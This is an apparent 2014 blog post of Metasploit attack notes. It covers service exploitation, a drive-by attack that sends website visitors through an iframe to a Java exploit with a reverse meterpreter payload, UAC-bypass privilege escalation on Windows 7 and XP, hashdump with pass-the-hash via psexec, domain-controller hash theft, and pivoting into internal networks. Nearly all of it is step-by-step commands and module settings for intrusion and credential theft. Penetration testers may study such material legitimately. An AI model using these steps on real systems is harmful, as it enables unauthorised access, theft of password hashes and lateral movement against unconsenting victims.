Metasploit – Attacks

By | 30/10/2014

Direct Attack

The attack consists on locate a vulnerable service in a server and use an exploit to obtain access to the system.

  1. Port scan and scanners to identify versions
    • Use auxiliary/scanner/portscan/tcp
    • Use auxiliary/scanner/smb/smb_version
    • Use auxiliary/scanner/http/http_version
      • Use show options and set <option> to configure the exploit
  2. Search or download an exploit for the vulnerable service service.
    • If not available in Metasploit, copy rb file in the module/exploit/<system>/<service>/
    • use exploit/<system>/<service>/<explot>
      • Use show options and set <option> to configure the exploit
    • Execute run or exploit

A easy example to try this attack is the Easy File Management vulnerability.

Client Side Attack

It consist on waiting for clients to connect to a website, where they are redirected to the Metasploit device that is listening to a port. Then, Metasploit tries to run an exploit in the client machine.

  1. Apache cofniguration
    • Setup a website with an iframe (or other elements) pointing to the port 8080 of the Metasploit machine
  2.  Configure a listening port in Metasploit prepared to answer with the Java exploit
    • Use exploit/multi/browser/<exploit>
    • Set uripath /
    • Set payload java/meterpreter/reverse_tcp
    • Set Target <- it allows to specify the system target, allowing more payload options, but limiting the scope of the attack to only that systems. (show target, set target).
  3. Client should access to the website. The connection will be setup as a session in Metasploit.

As an option, initialautorunscript can be set in the payload to run a few commands as soon as the exploit is run in the client machine. This script can point to a rc file with more than one command.
set initialautorunscript ‘multi_console_command -rc /root/ncn.rc’

Java 7 update 5 can be exploited as example using the exploit java_jre17_jmxbean

Privilege escalation

When a exploit is run successfully in the victim, it usually provides non-admin rights to the meterpreter or the payload. In order to get Administrator rights or System rights, we need to do a privilege escalation. The process will depend on the victim system.

The objective of the attacker is to get a Meterpreter console with System rights (getuid command in meterpreter console will provide that information)

Windows 7 x64

  1. Create a mterpreter payload application
    • use payload/windows/meterpreter/reverse_tcp
    • generate -f /root/test.exe (–> seems to create 32bits file… how to create this with 64bits?)
  2. Create a handler to listen to the reverse meterpreter
    • use exploit/multi/handler
    • exploit -j (make it run in the background)
  3. Get a remote meterpreter shell exploiting a known vulnerability (see direct attack or client side attacks)
  4. Upload bypassuac.exe, bypassuac.dll and test.exe to the victim server
    • Meterpreter Shell> upload /usr/share/metasploit-framework/data/post/bypassuac-x64.exe c:\\users\\<username>\\
  5. Run windows shell from meterpreter
    • Meterpreter Shell> shell
  6. Execute “bypassuac -c cd”
    • This will create a new shell c:\windows\system32
  7. Open reverse connection running the test.exe application
    • A new session should be setup in Metasploit framework

Windows 7 x86

  1. Get a remote meterpreter shell exploiting a known vulnerability (see direct attack or client side attacks)
  2. Return to the Metasploit console using ctrl+z
  3. Run the Windows local exploit to bypass the UAC
    • use exploit/windows/local/bypassuac
    • set sessionID of the session already open of the server
    • if the exploit is successful, it will generate a new session with System rights

Windows XP

  1. Get a remote meterpreter shell exploiting a known vulnerability (see direct attack or client side attacks)
  2. Run the command Meterpreter shell> getsystem

Pass the Hash

This attack consists on using the administrator user hash obtained in a server to login to other servers. It will only work if the password is the same for both servers.

  1. Exploit a server and obtain system privilege with Meterpreter (see the previous sections)
  2. Use the meterpreter script run hashdump and obtain the Administrator password (hash:salt)
  3. Use the exploit psexec with the pass hash
    • use exploit/windows/smb/psexec
    • set SMBpass HASH:SALT
    • a new shell will be open with SYSTEM privileges!

When the server is a Domain Controller, the POST module post/windows/gather/smart_hashdump can be used to obtain the hashes of all the users in the domain controller.

Pivoting

This technique will use an already established session to a victim to route the metasploit attacks through the victim to attack the internal network.

  1. Exploit a server and open a meterpreter shell (see the previous sections)
  2. Check network connections and check there is a internal network only accessible by the victim
    • Meterpreter> ipconfig
  3. Return to the msfconsole and add a route to that internal netowrk through the victim session
    • Msfconsole> route print – to check the current routes
    • Msfconsole> sessions – to check the sessions
    • Msfconsole> route add 10.0.0.0 255.255.255.0 SESSIONID
  4. Perform a network/port scan of the private network
    • Use auxiliary/scanner/portscan/tcp
    • set rhosts 10.0.0.0/24, set ports 60-200, set therads 10

Pivoting can also be done directly from meterpreter console thorugh the autoroute command.